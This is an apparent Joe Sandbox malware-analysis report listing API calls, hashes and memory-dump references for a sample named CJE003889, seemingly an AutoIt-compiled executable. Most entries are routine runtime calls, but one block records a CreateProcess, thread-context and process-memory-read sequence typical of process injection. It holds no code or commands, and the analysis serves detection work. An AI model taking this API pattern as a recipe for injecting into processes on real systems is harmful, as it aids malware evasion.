                                                          • Opcode Fuzzy Hash: c9bb11205c818d4533b9b28042d8ade3b41e6b813dede394714e2ed4b221777c
                                                          • Instruction Fuzzy Hash: 4521D7745047949FEB328B249899BEBBBEC9F15314F0400DDE79FAB281C3742A85DB51
                                                          APIs
                                                          • _memset.LIBCMT ref: 00C9EA39
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00C9EA83
                                                            • Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770
                                                            • Part of subcall function 00C80791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C807B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 1f3e8e3694b963ced71edf51f380e7c8729fe0d6a91b5a13e57f417c59b48535
                                                          • Instruction ID: d78c0df51c27a5ff2fe286a47d644d984b15522351fc3139ea8256c28654d377
                                                          • Opcode Fuzzy Hash: 1f3e8e3694b963ced71edf51f380e7c8729fe0d6a91b5a13e57f417c59b48535
                                                          • Instruction Fuzzy Hash: CD21C330A00258ABCF51DF94D889BEE7BF8AF49314F00405AE408EB381DFB45989DFA1
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00CC98F8
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CC990F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 4ab77829d93e3a32bf9e2e85d36d85559210d85e5fe27ab3875356de93be34db
                                                          • Instruction ID: 0b145240a64ed076314f15d113409f39ee4f00eb4cdd4516f9d5f506487e3ae9
                                                          • Opcode Fuzzy Hash: 4ab77829d93e3a32bf9e2e85d36d85559210d85e5fe27ab3875356de93be34db
                                                          • Instruction Fuzzy Hash: 55D05E7994030DBBDB50DBA4EC8EFDA773CE704700F0002B1BB94990A1EEB095999BA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b409dbdce516ea31de780fbf6570d991c93366a0f4e13ab33b258d676274253f
                                                          • Instruction ID: 925b0983a718331f544ec59acd5d8d139d012252572933cd5cc1dd45148b84be
                                                          • Opcode Fuzzy Hash: b409dbdce516ea31de780fbf6570d991c93366a0f4e13ab33b258d676274253f
                                                          • Instruction Fuzzy Hash: 94F129716083419FCB14DF29C484A6ABBE5FF88314F14892EF9A99B351D731E945CF82
                                                          APIs
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C80193
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C8019B
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C801A6
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C801B1
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C801B9
                                                            • Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C801C1
                                                            • Part of subcall function 00C760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C6F930), ref: 00C76154
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C6F9CD
                                                          • OleInitialize.OLE32(00000000), ref: 00C6FA4A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CA45C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 1986988660-0
                                                          • Opcode ID: 7c772a5b59a49833197f9ab5d6843a487aad812a1f30fdbf39f94d2fa8c7f8e8
                                                          • Instruction ID: 0dd193500c4c7bb75e364dd6b00a2021ef80587afc85c33010c2680ce2588adf
                                                          • Opcode Fuzzy Hash: 7c772a5b59a49833197f9ab5d6843a487aad812a1f30fdbf39f94d2fa8c7f8e8
                                                          • Instruction Fuzzy Hash: 7C819EB0905B40CFC7A4EF29F844E29BBE5EBB9316790852AD419CB369E77045878F31
                                                          APIs
                                                          • _memset.LIBCMT ref: 00C64370
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C64415
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C64432
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: a610f7dc3b06ac95d68b8eb680caea269b02f494021a825b899d8a1c46a7e2fe
                                                          • Instruction ID: bb82d3d16b157959b14be2fd8493a4580a6578e374096c5537a4e541da37f6c5
                                                          • Opcode Fuzzy Hash: a610f7dc3b06ac95d68b8eb680caea269b02f494021a825b899d8a1c46a7e2fe
                                                          • Instruction Fuzzy Hash: DC318EB0504701CFC735DF24D885A9BBBE8FF58309F00092EE69AC6391E771AA44CB66
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00C85733
                                                            • Part of subcall function 00C8A16B: __NMSG_WRITE.LIBCMT ref: 00C8A192
                                                            • Part of subcall function 00C8A16B: __NMSG_WRITE.LIBCMT ref: 00C8A19C
                                                          • __NMSG_WRITE.LIBCMT ref: 00C8573A
                                                            • Part of subcall function 00C8A1C8: GetModuleFileNameW.KERNEL32(00000000,00D233BA,00000104,?,00000001,00000000), ref: 00C8A25A
                                                            • Part of subcall function 00C8A1C8: ___crtMessageBoxW.LIBCMT ref: 00C8A308
                                                            • Part of subcall function 00C8309F: ___crtCorExitProcess.LIBCMT ref: 00C830A5
                                                            • Part of subcall function 00C8309F: ExitProcess.KERNEL32 ref: 00C830AE
                                                            • Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28
                                                          • RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 5b86a408888c8e3d70c29d91ff2ac483d348f72415e3c6c38090d95788c736de
                                                          • Instruction ID: 7a00250a91698fc75bd70341144d0c871e8c2dc2376d8afea5036bc50778cd8e
                                                          • Opcode Fuzzy Hash: 5b86a408888c8e3d70c29d91ff2ac483d348f72415e3c6c38090d95788c736de
                                                          • Instruction Fuzzy Hash: 8A01D235310B11DBE6213735AC82B2E73488F92769F50443AF515DA291DFB49D01576C
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CC9548,?,?,?,?,?,00000004), ref: 00CC98BB
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CC9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CC98D1
                                                          • CloseHandle.KERNEL32(00000000,?,00CC9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CC98D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: ac193f67eafb7563bb267006d423a5208bd8303a430f90d539784b8b218546d1
                                                          • Instruction ID: 2df8867749d899f1577a461858cf53c7e60988996fa5be33928619df9eb74824
                                                          • Opcode Fuzzy Hash: ac193f67eafb7563bb267006d423a5208bd8303a430f90d539784b8b218546d1
                                                          • Instruction Fuzzy Hash: 33E08632140218B7EB211B54EC4AFDE7B19EB06761F108124FB246D0F087B116129798
                                                          APIs
                                                          • _free.LIBCMT ref: 00CC8D1B
                                                            • Part of subcall function 00C82D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C89A24), ref: 00C82D69
                                                            • Part of subcall function 00C82D55: GetLastError.KERNEL32(00000000,?,00C89A24), ref: 00C82D7B
                                                          • _free.LIBCMT ref: 00CC8D2C
                                                          • _free.LIBCMT ref: 00CC8D3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                          • Instruction ID: 417801a4e3490775b197480215d501554a87f86d7070c6b70e043e3f5823f950
                                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                          • Instruction Fuzzy Hash: 00E017B1601A0246CB24B6B8EA48F9327EC4F98356B14091EF52ED7186CE64FD86D328
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 65495250f1198f6e67bd0caa6a226c97fb9e7a6bf8a318b0bd6efd9778c6a418
                                                          • Instruction ID: 65a7cc93f0ad3035b139d157dd5ef54406067a156bb74ca798fcaf0a19eb07a5
                                                          • Opcode Fuzzy Hash: 65495250f1198f6e67bd0caa6a226c97fb9e7a6bf8a318b0bd6efd9778c6a418
                                                          • Instruction Fuzzy Hash: 02224570508301DFCB24DF14C494A6ABBE1BF85304F24896DE99A9B362D736ED85DF82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: EA06
                                                          • API String ID: 4104443479-3962188686
                                                          • Opcode ID: 0963407d1219b9c715ab7b34b6660aca03c5bd3e0397299a121961bac0861328
                                                          • Instruction ID: a764642b03013cf7888109d232f541b9c54f8a04fbd4f7f1c170d6d2d89aea5a
                                                          • Opcode Fuzzy Hash: 0963407d1219b9c715ab7b34b6660aca03c5bd3e0397299a121961bac0861328
                                                          • Instruction Fuzzy Hash: 8D417D31E041586BCF399B64CCE17BF7FA2DB46300F284475ED86EB282D6319E4493A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                          • Instruction ID: cf33e8b245f5484974385f862bb0f788b45414bda0d73518e536db10409b523b
                                                          • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                          • Instruction Fuzzy Hash: 7F31C8B1604606AFC714DF68C8D1D69F3A9FF48314B158B29E529CB391EB30ED50DB90
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00C64834
                                                            • Part of subcall function 00C8336C: __lock.LIBCMT ref: 00C83372
                                                            • Part of subcall function 00C8336C: DecodePointer.KERNEL32(00000001,?,00C64849,00CB7C74), ref: 00C8337E
                                                            • Part of subcall function 00C8336C: EncodePointer.KERNEL32(?,?,00C64849,00CB7C74), ref: 00C83389
                                                            • Part of subcall function 00C648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C64915
                                                            • Part of subcall function 00C648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C6492A
                                                            • Part of subcall function 00C63B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C63B68
                                                            • Part of subcall function 00C63B3A: IsDebuggerPresent.KERNEL32 ref: 00C63B7A
                                                            • Part of subcall function 00C63B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D252F8,00D252E0,?,?), ref: 00C63BEB
                                                            • Part of subcall function 00C63B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C63C6F
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C64874
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: 5258e309804ea9c41fe02f3520d8e9da71e5690e756044b1a62a522f246983fb
                                                          • Instruction ID: 564e8decc7656eedf4f7d4c077ed0f51fbd64dd376f57eb2e1df265a68c7a7df
                                                          • Opcode Fuzzy Hash: 5258e309804ea9c41fe02f3520d8e9da71e5690e756044b1a62a522f246983fb
                                                          • Instruction Fuzzy Hash: 58118C71908341DBD720EF69EC8591EBBE8EFA8750F10451EF480C72B1DB709A46CBA6
                                                          APIs
                                                            • Part of subcall function 00C8571C: __FF_MSGBANNER.LIBCMT ref: 00C85733
                                                            • Part of subcall function 00C8571C: __NMSG_WRITE.LIBCMT ref: 00C8573A
                                                            • Part of subcall function 00C8571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F
                                                          • std::exception::exception.LIBCMT ref: 00C80DEC
                                                          • __CxxThrowException@8.LIBCMT ref: 00C80E01
                                                            • Part of subcall function 00C8859B: RaiseException.KERNEL32(?,?,?,00D19E78,00000000,?,?,?,?,00C80E06,?,00D19E78,?,00000001), ref: 00C885F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: 00e019e3ad042aeca6467c9650b0373103a0a56e16343e3b5da84107250be987
                                                          • Instruction ID: bf30ae0d4ca0e44f437bf858e446e7408c15949788e9fb053929bf1e833413a6
                                                          • Opcode Fuzzy Hash: 00e019e3ad042aeca6467c9650b0373103a0a56e16343e3b5da84107250be987
                                                          • Instruction Fuzzy Hash: DEF0A47150021E66DB10BAA4EC119EFBBAC9F01359F20442AFD1496691DFB09A88E3DA
                                                          APIs
                                                            • Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28
                                                          • __lock_file.LIBCMT ref: 00C853EB
                                                            • Part of subcall function 00C86C11: __lock.LIBCMT ref: 00C86C34
                                                          • __fclose_nolock.LIBCMT ref: 00C853F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: 11192cb707e96e3cafa1d11a2ec55de36c436b8e60396fc340cba529516eab7a
                                                          • Instruction ID: 1e9521df2d8a1cbfe2d8a496a84a2d2226b6dc51677558b9e3edff0541eb2029
                                                          • Opcode Fuzzy Hash: 11192cb707e96e3cafa1d11a2ec55de36c436b8e60396fc340cba529516eab7a
                                                          • Instruction Fuzzy Hash: 20F0B471901A049ADB21BF759C027AE77E06F4137DF608209E424AB5D1CFFC8A45BB5E
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01014C6B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01014D01
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01014D23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                          • Instruction ID: 726afc8c14c464b43dc39c7b331e471ca8bc16a362d5c035f64c91f5aa2b6a61
                                                          • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                          • Instruction Fuzzy Hash: B612CD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: a71cdecc6b5476ee6599335bfe42894ccb7f1cd48810b4288e4e22d7ca6ac7c0
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: C531E370A001059FC798EF09C494969FBA6FB49304F3486A5E81ACB351D631EEC5DB8A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
